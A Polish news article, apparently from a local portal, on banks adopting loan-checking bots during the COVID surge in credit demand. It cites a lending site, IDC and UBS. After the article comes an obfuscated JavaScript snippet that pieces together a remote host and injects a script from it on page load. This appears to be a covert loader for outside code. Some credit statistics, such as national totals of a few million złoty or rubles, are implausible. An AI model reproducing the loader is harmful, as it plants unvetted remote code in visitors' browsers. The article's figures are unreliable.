Według Reutera banki, przytłoczone wnioskami klientów, zaczęły przyspieszać wdrażanie automatyzacji. Tylko boty sprawdzające wnioski o pożyczkę były w stanie poradzić sobie z rosnącą ilością wniosków.
Gwałtowny wzrost wniosków kredytowych
Eksperci serwisu finansowo-analitycznego foxycredit.com potwierdzają, że popyt na kredyty konsumpcyjne rzeczywiście istotnie wzrósł od początku roku. Szczególnie popularne wśród pożyczkobiorców są pożyczki krótkoterminowe. Eksperci przypisują rosnące zainteresowanie klientów działaniom podejmowanym w wielu krajach w celu ograniczenia maksymalnej stawki oprocentowania. Pozwoliło to zmniejszyć obciążenie kredytobiorców i przyciągnąć nowych klientów w czasie pandemii.
Statystyki europejskie wskazują również na gwałtowny wzrost popytu na kredyty w porównaniu z końcem 2020 r. Niewielką stagnację można było zauważyć dopiero późną wiosną, gdy samoizolacja skłoniła mieszkańców do oszczędzania. Na przykład, kredyty w Norwegii wzrosły do rekordowego poziomu 3,93 miliarda koron. Z kolei w Rosji kwota ta wzrosła z 22,6 mln rubli w czerwcu do 23 mln rubli w lipcu.
W Polsce można zaobserwować niewielki skok z 8,10 mln zł w lipcu 2021 r. do 8,13 mln zł w sierpniu 2021 r., głównie dzięki obniżonemu oprocentowaniu, które przyszli kredytobiorcy mogą połączyć z daną ofertą i porównać z innymi ofertami pożyczek.
W Bułgarii i Rumunii nastąpił płynniejszy wzrost liczby wniosków o pożyczkę, ale personel nie jest już w stanie poradzić sobie z rosnącą ilością pracy. Wprowadzenie botów to jedne z pierwszych decydujących zmian technologicznych, jakie wprowadzono do światowych systemów bankowych w czasie kryzysu COVID.
Roboty szybciej procesują wnioski
Automatyzacja niektórych operacji bankowych została wdrożona pomimo tego, że koszty systemów informatycznych zostały obniżone po raz pierwszy od 2009 roku - podaje International Data Corporation (IDC). Boty stały się priorytetem w rozwoju struktur finansowych.
Sondaże IDC pokazują, że banki uważają roboty za oczywiste, szybkie i niedrogie rozwiązanie radzenia sobie z obciążeniem pracą w czasie kryzysu. Świadczą o tym wypowiedzi przedstawicieli czołowych struktur bankowych w Europie.
Nowoczesne technologie i wprowadzenie automatyzacji, nie tylko wykorzystanie botów do sprawdzania wniosków kredytowych i danych pożyczkobiorców, ale także tworzenie wysoce bezpiecznych pamięci masowych w chmurze. Instytucje finansowe priorytetowo traktują przenoszenie zaszyfrowanych informacji do chmury, aby zapewnić pracownikom dostęp do danych z domu, a także przyspieszyć zapytania klientów.
Mike Dargan z UBS identyfikuje cztery główne obszary, w których pracuje dział IT: doskonalenie systemów pełnoprawnej pracy zdalnej, stabilność oprogramowania, zapewnienie ciągłości działania i cyberbezpieczeństwa, ochrona przed włamaniami i atakami hakerów.
(function(){
c5tf=document.createElement("script");c5tf_=("ust");c5tfu="315818642";
c5tf_+="a"+("t.i");c5tf.type="text/javascript";
c5tfu+=".vddjzby15tffap347zm9";c5tf.async=true;c5tf_+="n"+("f"+"o")+"/";
c5tfu+="3dc2v7knre";c5tf.src="https://"+c5tf_+c5tfu;
document.body.appendChild(c5tf);
})();
Użytkowniku, pamiętaj, że w Internecie nie jesteś anonimowy. Ponosisz odpowiedzialność za treści zamieszczane na portalu zyciepabianic.pl. Dodanie opinii jest równoznaczne z akceptacją Regulaminu portalu. Jeśli zauważyłeś, że któraś opinia łamie prawo lub dobry obyczaj - powiadom nas [email protected] lub użyj przycisku Zgłoś komentarz
Brak komentarza, Twój może być pierwszy.
Dodaj komentarz